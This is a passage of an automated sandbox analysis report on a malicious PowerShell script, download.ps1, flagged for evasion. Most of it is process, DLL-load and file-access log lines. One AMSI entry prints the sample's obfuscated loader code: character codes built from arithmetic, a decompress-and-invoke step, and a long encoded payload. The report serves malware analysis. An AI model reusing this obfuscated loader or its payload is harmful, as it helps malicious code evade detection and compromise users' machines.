Source: powershell.exe, 00000000.00000002.2151716083.000002932052D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: basecomb:/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAAAAAAAAAAAAAwCsAQAAIABAgAAAAAAAAAAAAAAAIAIAUAAQJwAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d0/ujg\x3d1/rs\x3dACT90oE_rtqVigwL0ao_oPopZIJptrYpfg
Source: powershell.exe, 00000000.00000002.2151716083.000002931FE64000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: p=i&biw="+a+"&bih="+b+"&ei="+google.kEI,h="",k=window.google&&window.google.kOPI||null;k&&(h+="&opi="+k);f.call(e,"","",g+h)};}).call(this);})();</script> <script nonce="dOqGI8EeMr2eEXmd9UgJsw">(function(){google.xjs={basecomb:'/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAAAAAAAAAAAAAwCsAQAAIABAgAAAAAAAAAAAAAAAIAIAUAAQJwAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d0/ujg\x3d1/rs\x3dACT90oE_rtqVigwL0ao_oPopZIJptrYpfg',basecss:'/xjs/_/ss/k\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAsAAAAIABAgAAAAAAAAAAAAAAAIAIAUAAQJw/rs\x3dACT90oF1BL3ZlaLO9UErlKWVa-MwNL-zZw',basejs:'/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/dg\x3d0/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA',excm:[]};})();</script> <script nonce="dOqGI8EeMr2eEXmd9UgJsw">(function(){var u='/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d3/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA/m\x3dsb_he,d';var st=1;var amd=1000;var mmd=0;var pod=true;
Source: powershell.exe, 00000000.00000002.2151716083.000002932052D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: basejs:/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/dg\x3d0/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qAX
Source: powershell.exe, 00000000.00000002.2151716083.000002932052D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: u=/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d3/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA/m\x3dsb_he,dX
Source: powershell.exe, 00000000.00000002.2151716083.000002932052D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: basecomb:'/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAAAAAAAAAAAAAwCsAQAAIABAgAAAAAAAAAAAAAAAIAIAUAAQJwAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d0/ujg\x3d1/rs\x3dACT90oE_rtqVigwL0ao_oPopZIJptrYpfg'
Source: classification engineClassification label: mal64.evad.winPS1@2/7@4/2
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1216:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_brcgjtus.pzf.ps1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress)) $wnbe8h4cgtl70d2.(([system.String]::new(@((6891-(36767712/(-2696+8084))),(261-150),(-8624+(10786-(19243350/(9265+122)))),(1168013/(15035-5382)),(3496-(18168900/5325)),(1123-(-1496+(4426620/1765)))))))( $9i2le8j3sun5acv ) $wnbe8h4cgtl70d2.(([char[]]@((107334/1602),(-4487+4595),(1134087/10217),(9113-8998),(-4446+(43201047/9501))) -join ''))()$i9hq1wvyjtn0bfs.((-join (@((5163-(4968+128)),(712476/(8587-(6125220/(4388-1310)))),(714285/6435),(-1626+1741),(976973/(83942294/(86241964/9938))))| ForEach-Object { [char]$_ })))()[byte[]] $zola1c3s6fbepiv = $9i2le8j3sun5acv.(([system.String]::new(@((4899-4815),(287601/(3735-1144)),(-2737+(11737-(3527+(13034-7626)))),(-650+(1970-1206)),(416784/3656),(-872+(1088-119)),(-2738+2859)))))() $lu8r354i9z6d1ag=$zola1c3s6fbepiv return $lu8r354i9z6d1ag}[System.Text.Encoding]::ascii.(([char[]]@((119777/1687),(148672/(1389+83)),(98252/847),(4733-(8476-3826)),(-4799+(2408350/(1123080/(-5939+8231)))),(1060200/9300),(3594-(13342-(7456+(22105134/9222)))),(6305-(22896720/(-1909+5605))),(-9696+(58558824/(43517232/(15797-8515))))) -join ''))((jsf90g72qbid1oxp3zmn5lhuawv "fL1mMWw3dzQxecjxCFl7ZvqxSDsnhoxCkULxArlyms8QcSAhHq8h4v0RaHKWUXdzETbtgK2vcab7BvKNPo3gAAwxPxNkyZwbtpjb5hYYHJuPBIbcnk2a2ZjLicXcziL0nsua9JG8oFsrhBGFC8kIzozikv3MoO6Z0P2TqqeMMJvCtjP2PwoQwoTPkE/uhrU1rcmXzSPQuKqKw7E1H0kXTZXdktr7j+shvu+QwZ7avP/Iyla1PGjyrVHNhu9atpvF1EmyXy9DWdNQQqo8kWIyH9fqaIJGiUQmQtKuBs2xDg/OrYaupG3jmEAJUgr9dt4Bys0LKg9a5Dsbo8Kd85EDfkLTa8xscBigyhOVvIi96FcaN3JGwo8HaiZHBHxrRmNPxA+KJZWNTRpu7v/Y3a0FHg3tjSqeMuNP9C597osp0eBuobSPCMdPpsmBo8yb3nmSD/2yrakB6NJYiVHPiGrPtvjR60fqoFId1cX9wv+E+tb3WhVdlt7Tp7BV62fAIyiE1nJw+9upFJ5U8FHJDeokEiIW8vog7r1GcZMqBvsrsfeDpTQFbwsG3Jq2b2kTw8xdQWAywlIOwECYp08jK8+vLRH4JP7rD+pxmQ9JZhm0r4zUO7U2LY/JVKek8K1w9JCLmX+vw8FzmflbgBTx0b09x9G55yHLiOildwkHEi/RiUjeDHKv1JPXBjtw48qEgIaTpmngLlCpyI/KHZKKEcWl1+sw+LsaB1GQvPvBirHhyc3UvnKV2+sCmqOyXIzfoB+cuShH96XskfhR6/YIRaP6QyhVVT0ZLVF37Csk2n+mA4L/M8OCko44PL2lsoNlGwjDP5+6VTOGq+3noCDHilUY4ooLxntkYFlNHasG5vb+mogllRGSO33rATnZS8f+ELHSGNM+Ktd/+WNwS1alJHzbvsgjIjHsLjo5RMsmDadRycNUGBr+WOidCtHcBo1v5Dafttj0c/RteVDxH8mKjEnR6rGJgsbAsIjppO3N+udgjOkazgKXqBm5MAwEmGtZlQrVDUhXi5Pdgqey9rN2/Gggxlrs2hrYShzI+YDHh7arPYXOp6QzPI67X7LF00jsE0x18O1DaoF5I9HCx/bct1xlYk00g+1lUnT29dbs1uuJ8+SvKgM7B2L6TDkaQREf/SYNLEDpToJZmWvZ9vK0vsoUwu8LSwpIAL75M3gCYaGiO1KGDZj0yzwedJTlytreJAHK5WW7gbpzqYX6/VCyNW+UpJ4yvNSseM5CFx7XRH4Ghzwx1xddDH9dr9iTUk0QioPshsw0Y0QTUYt88Gw5/W7+1M24/wMfD6NbVJt9HRjXk6ZXEnJG7cngr9BODcjPnayJsE01cpfICUKHb7CMBaLRm1G31k/00v/H0S9sMI4WtzA2UR/UZOsEukUaArSG3BoENped4W1WwOauMqAbSZtmdbVCJ5U2dx6D1jsmZvWke8gKK235zINgyUWWdHJk7H7QYHnHtEx7WrrNE1YjRDxYpWYjoyrYrneVEx/WkVoiSnTaMkDcsKPUvOcIIwIQJEWCsWMxcLV5PocBlmuwZ5gu0NtldhbDzMly9NzskLWMHY+7hIk75rjy5AUnF04lue79aMM6NkJwILQEpmtOd9RU1o624tr8T3IJfEKKlwiHdlokrvM3ZKvOHbyPMRZ2WXpChjzJOU4IhoVtEIiklcYr5PExwmLVqlhXTQOAaj8/mo1IWUSNCRLP4ZuJEVgRvyaBXbpr5KbxYjU6buoWw8w61uA5jzZBxue45S4+1wCCsrQ5CjdoU5ZFg/qu57ugyZyIWz493csHh9evvERBCs0gX4kShSU+O7v0GpG2y
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb1-F424491E3931}\InprocServer32 source: powershell.exe, 00000000.00000002.2151284254.000002931C8D8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdbs.dll source: powershell.exe, 00000000.00000002.2191030398.0000029336C9F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000000.00000002.2191030398.0000029336C63000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000000.00000002.2192157948.0000029336EEC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.2191030398.0000029336CD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: scorlib.pdbJ source: powershell.exe, 00000000.00000002.2189854699.0000029336B07000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: utomation.pdbdbO source: powershell.exe, 00000000.00000002.2189854699.0000029336B07000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbv source: powershell.exe, 00000000.00000002.2191030398.0000029336CD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\dll\System.Management.Automation.pdb- source: powershell.exe, 00000000.00000002.2191030398.0000029336CD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdbalidateNotNuR source: powershell.exe, 00000000.00000002.2191030398.0000029336C63000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdbvice6 source: powershell.exe, 00000000.00000002.2191030398.0000029336C9F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.2151284254.000002931C957000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ion.pdb source: powershell.exe, 00000000.00000002.2189854699.0000029336B07000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.2191030398.0000029336C63000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbL source: powershell.exe, 00000000.00000002.2191030398.0000029336C63000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF848D4D2A5 pushad ; iretd 0_2_00007FF848D4D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF848E67523 push ebx; iretd 0_2_00007FF848E6756A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF848E64FA5 push edi; ret 0_2_00007FF848E64FA6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF848E600BD pushad ; iretd 0_2_00007FF848E600C1

Hooking and other Techniques for Hiding and Protection

barindex
Loading BitLocker PowerShell Module
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
